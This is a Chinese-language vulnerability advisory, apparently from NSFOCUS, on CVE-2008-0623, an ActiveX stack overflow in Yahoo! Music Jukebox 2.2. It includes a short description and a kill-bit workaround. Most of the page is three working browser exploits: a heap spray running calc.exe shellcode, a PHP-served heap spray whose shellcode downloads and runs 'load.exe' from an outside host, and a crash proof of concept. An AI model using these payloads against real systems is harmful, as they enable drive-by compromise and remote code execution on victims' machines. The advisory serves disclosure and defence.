安全研究
安全漏洞
Yahoo! Music Jukebox datagrid.dll ActiveX控件AddImage函数远程栈溢出漏洞
发布日期:2008-02-04
更新日期:2008-02-22
受影响系统:
Yahoo! Music Jukebox 2.2描述:
BUGTRAQ ID: 27590
CVE(CAN) ID: CVE-2008-0623
Yahoo! Music Jukebox是一款音乐编辑、管理、刻录软件。
Yahoo! Music Jukebox的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
Yahoo! Music Jukebox所安装的YMP DataGrid ActiveX控件(datagrid.dll)没有正确地处理传送给AddImage()方式的输入参数,如果用户受骗访问了恶意站点并向该参数传送了超长字符串的话,就可能触发栈溢出,导致执行任意指令。
<*来源:Krystian Kloskowski (h07@interia.pl)
链接:http://secunia.com/advisories/28757/
http://www.kb.cert.org/vuls/id/101676
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Yahoo! Music Jukebox 2.2 AddImage() ActiveX BOF
Discovered by Krystian Kloskowski - h07@interia.pl
Written by exceed (code ripped from here and there...)
Tested on Windows XP SP3 English / IE6 SP3 / datagrid.dll v2.2.2.56
-->
<html>
<object classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"
id="target"></OBJECT>
<SCRIPT language="JavaScript">
// HeapSpray - execute calculator (calc.exe)
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
"%u314e%u7475%u7038%u7765%u4370");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<400;i++) memory[i] = block + shellcode;
var buffer = unescape("%u0A0A%u0A0A");
while (buffer.length< 340) buffer+=unescape("%u0A0A%u0A0A");
target.AddImage("http://"+buffer,1);
</script>
</html>
<?php
// 0x48k-ymj by ...
// based on /5043
// Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
function unescape($s){
$res=strtoupper(bin2hex($s));
$g = round(strlen($res)/4);
if ($g != (strlen($res)/4))$res.="00";
$out = "";
for ($i=0; $i<strlen($res);$i+=4)$out.="%u".substr($res, $i+2, 2).substr($res, $i, 2);
return $out;
}
echo '
<html>
<body>
<object id="obj" classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"></object>
<script language="JavaScript">
function gsc(){
var hsta = 0x0c0c0c0c;
var plc = unescape("%u4343%u4343"+
"%u0feb%u335b%u66c9%u80b9%u8001%uef33"+
"%ue243%uebfa%ue805%uffec%uffff%u8b7f"+
"%udf4e%uefef%u64ef%ue3af%u9f64%u42f3"+
"%u9f64%u6ee7%uef03%uefeb%u64ef%ub903"+
"%u6187%ue1a1%u0703%uef11%uefef%uaa66"+
"%ub9eb%u7787%u6511%u07e1%uef1f%uefef"+
"%uaa66%ub9e7%uca87%u105f%u072d%uef0d"+
"%uefef%uaa66%ub9e3%u0087%u0f21%u078f"+
"%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96"+
"%u0757%uef29%uefef%uaa66%uaffb%ud76f"+
"%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef"+
"%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba"+
"%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0"+
"%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c"+
"%u66bf%ucfaa%u1087%uefef%ubfef%uaa64"+
"%u85fb%ub6ed%uba64%u07f7%uef8e%uefef"+
"%uaaec%u28cf%ub3ef%uc191%u288a%uebaf"+
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85"+
"%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8"+
"%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf"+
"%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc"+
"%uefef%uef85%u9a10%u64cf%ue7aa%ued85"+
"%u64b6%uf7ba%uff07%uefef%u85ef%u6410"+
"%uffaa%uee85%u64b6%uf7ba%uef07%uefef"+
"%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec"+
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10"+
"%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+
"%u64d3%uf19b%uec97%ub91c%u9964%ueccf"+
"%udc1c%ua626%u42ae%u2cec%udcb9%ue019"+
"%uff51%u1dd5%ue79b%u212e%uece2%uaf1d"+
"%u1e04%u11d4%u9ab1%ub50a%u0464%ub564"+
"%ueccb%u8932%ue364%u64a4%uf3b5%u32ec"+
"%ueb64%uec64%ub12a%u2db2%uefe7%u1b07"+
"%u1011%uba10%ua3bd%ua0a2%uefa1"+
"'.unescape("http://site.come/load.exe").'");
var hbs=0x400000;
var pls=plc.length*2;
var sss=hbs-(pls+0x38);
var ss=unescape("%u0c0c%u0c0c");
ss=gss(ss,sss);
hbs=(hsta-0x400000)/hbs;
for(i=0;i<hbs;i++)m[i]=ss+plc;
}
function gss(ss,sss){
while(ss.length<sss*2)ss+=ss;
ss=ss.substring(0,sss);
return ss;
}
var m=new Array();
gsc();
try{
var tmp=gss(unescape("%u0c0c%u0c0c"),340);
obj.AddImage("http://"+tmp,1);
}catch(e){}
</script>
</body>
</html>
';
?>
<!--
Yahoo! Music Jukebox 2.2 AddImage() ActiveX 0day Remote Buffer Overlow PoC Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Product homepage: http://music.yahoo.com/jukebox/
Tested on:..
- Yahoo! Music Jukebox (2.2.2.056)
- MS IE 6
Details:..
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=03EC1370: BF 37 90 7C 58 14 EC 03-9C FF FB 03 74 14 EC 03
EBP=03EC1390: 40 14 EC 03 8B 37 90 7C-58 14 EC 03 9C FF FB 03
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A
Just for fun ;]
-->
<object id="obj" classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"></object>
<script>
function makebuf(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
var target = "AddImage";
var payload = unescape("%u4141%u4141");
var len = 340
var tmp = makebuf(payload, len);
obj[target]('http://'+tmp, 1);
</script>
建议:
临时解决方法:
* 在IE中禁用有漏洞的ActiveX控件,为以下CLSID设置kill bit:
{5F810AFC-BB5F-4416-BE63-E01DD117BD6C}
或者将以下文本报文为.REG文件并导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5F810AFC-BB5F-4416-BE63-E01DD117BD6C}]
"Compatibility Flags"=dword:00000400
厂商补丁:
Yahoo!
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://music.yahoo.com/jukebox/
浏览次数:3527
严重程度:0(网友投票)
绿盟科技给您安全的保障